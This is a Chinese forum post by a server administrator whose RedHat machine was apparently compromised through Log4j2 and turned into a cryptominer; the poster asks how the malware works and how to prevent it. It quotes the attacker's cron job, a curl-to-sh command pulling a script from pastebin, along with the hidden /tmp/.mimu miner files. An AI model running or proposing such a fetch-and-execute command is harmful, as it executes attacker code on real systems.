服务器被挖矿，找到相关文件及计划任务， google 过关键词得知是 Log4j2 漏洞导致被入侵，想知道该病毒运行的逻辑，找不到相关 sh 文件，求大佬指点。

环境介绍： 1 、redhat 6.3 2 、对外开启了 9000:80 端口的映射 3 、强密码验证（限制指定 IP 通过 ssh 连接）

已知信息： 1 、crontab -l 得知被添加了计划任务：curl -fsSL https://pastebin.com/raw/8DdBvkRn | sh （我尝试得到该脚本，但是请求出来只是字符串‘#endif’，我该如何得到该病毒脚本？ top 查看进程时候有看到 /tmp/.mimu/apache.sh ，但是实际去查看该病毒目录，并没有发现脚本，是否加载在内存中，实际脚本已被删除？） https://imgur.com/Huflmd7 https://imgur.com/2PZNjXR

2 、已知该脚本会生成隐藏目录 /tmp/.mimu/，下面包含挖矿程序 kthmimu 及配置文件 config.json https://imgur.com/Huflmd7

已自行尝试复现的测试： 1 、尝试 curl -fsSL https://pastebin.com/raw/8DdBvkRn | sh ，但是我并没有发现脚本文件及复现

求助： 1 、如何找出该脚本及实现逻辑？ 2 、如何防范？